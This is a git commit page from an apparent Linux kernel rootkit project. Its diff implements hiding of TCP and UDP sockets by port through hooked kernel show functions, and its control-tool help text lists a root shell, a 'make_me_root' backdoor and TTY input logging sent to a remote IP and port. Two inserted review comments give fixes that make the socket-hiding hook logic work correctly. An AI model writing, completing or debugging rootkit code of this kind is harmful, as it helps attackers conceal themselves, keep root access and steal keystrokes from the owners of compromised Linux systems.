linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit e7ca2836e27e50b88835eb8b54b46e2890735c41
parent 5520c73abf9e251b66a4dfd133a6976f2e3958fe
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 13 Dec 2020 01:19:58 +0100

Add necessary calls for sockhide

Diffstat:
Msrc/channel.c | 25++++++++++++++-----------
Msrc/rkctl/rkctl.c | 2++
2 files changed, 16 insertions(+), 11 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -15,6 +15,7 @@
 #include "inputlog.h"
 #include "ioctl.h"
 #include "rootkit.h"
+#include "sockhide.h"
 #define BUFLEN 512
@@ -185,20 +186,22 @@ handle_tcphide(unsigned long arg)
 	long sarg = (long)arg;
 	if (!sarg) {
-		// TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+		// TODO also remove all sockets (tcp & udp) that are currently being hidden
 		rootkit.hiding_sockets = 0;
+		unhook_show();
 		DEBUG_NOTICE("[g7] socket hiding off\n");
 	} else if (sarg < 0) {
-		// TODO unhide tcp socket for port `-sarg`
+		remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp4);
+		remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp6);
 		DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
 	} else if (sarg > 0) {
 		if (!rootkit.hiding_sockets) {
-			// TODO toggle hiding back on
+			hook_show();
 			DEBUG_NOTICE("[g7] socket hiding on\n");
 		}
-		// TODO hide tcp socket for port `sarg`
-		rootkit.hiding_sockets = 1;
+		add_port_to_list(&hidden_ports, (port_t)sarg, tcp4);
+		add_port_to_list(&hidden_ports, (port_t)sarg, tcp6);
 		DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
 	}
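Review bot: With `rootkit.hiding_sockets = 1;` removed from the `sarg > 0` branch, nothing in the new code ever sets the flag, so the `if (!rootkit.hiding_sockets)` guard appears to be true on every positive call and `hook_show()` is re-run for each added port, while `unhook_show()` runs only once on the zero path; the hook and unhook calls are no longer balanced. The guard block should record the state right after installing the hook, `hook_show(); rootkit.hiding_sockets = 1;`, as the removed line did. The handle_udphide hunk below has the same omission, and its zero branch also orders the two statements differently (here the flag is cleared before `unhook_show()`, there after it) — one order should be chosen so both handlers read as the same state transition. handle_tcphide's signature and return lie outside the hunk.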
@@ -211,20 +214,20 @@ handle_udphide(unsigned long arg)
 	long sarg = (long)arg;
 	if (!sarg) {
-		// TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+		unhook_show();
 		rootkit.hiding_sockets = 0;
 		DEBUG_NOTICE("[g7] socket hiding off\n");
 	} else if (sarg < 0) {
-		// TODO unhide udp socket for port `-sarg`
+		remove_port_from_list(&hidden_ports, (port_t)-sarg, udp4);
+		remove_port_from_list(&hidden_ports, (port_t)-sarg, udp6);
 		DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
 	} else if (sarg > 0) {
 		if (!rootkit.hiding_sockets) {
-			// TODO toggle hiding back on
+			hook_show();
 			DEBUG_NOTICE("[g7] socket hiding on\n");
 		}
-
-		// TODO hide udp socket for port `sarg`
-		rootkit.hiding_sockets = 1;
+		add_port_to_list(&hidden_ports, (port_t)sarg, udp4);
+		add_port_to_list(&hidden_ports, (port_t)sarg, udp6);
 		DEBUG_NOTICE("[g7] hiding udp socket with port %ld\n", sarg);
 	}
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -267,6 +267,8 @@ help()
 	printf("%-38s %s\n", "shell", "obtain a shell as root");
 	printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");
 	printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
+	printf("%-38s %s\n", "socket hide <tcp|udp> <port>", "hide a tcp or udp with the given port");
+	printf("%-38s %s\n", "socket unhide <tcp|udp> <port>", "unhide a tcp or udp with the given port");
 	printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>");
 	printf("%-38s %s\n", "inputlogging-off", "disable input logging");
 }
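Review bot: Both help strings added in the rkctl.c hunk drop the noun — `hide a tcp or udp with the given port` — where the neighbouring entries spell out what each command acts on; `"hide a tcp or udp socket with the given port"` and `"unhide a tcp or udp socket with the given port"` read correctly and stay within the same column layout. The start of help() is outside the hunk.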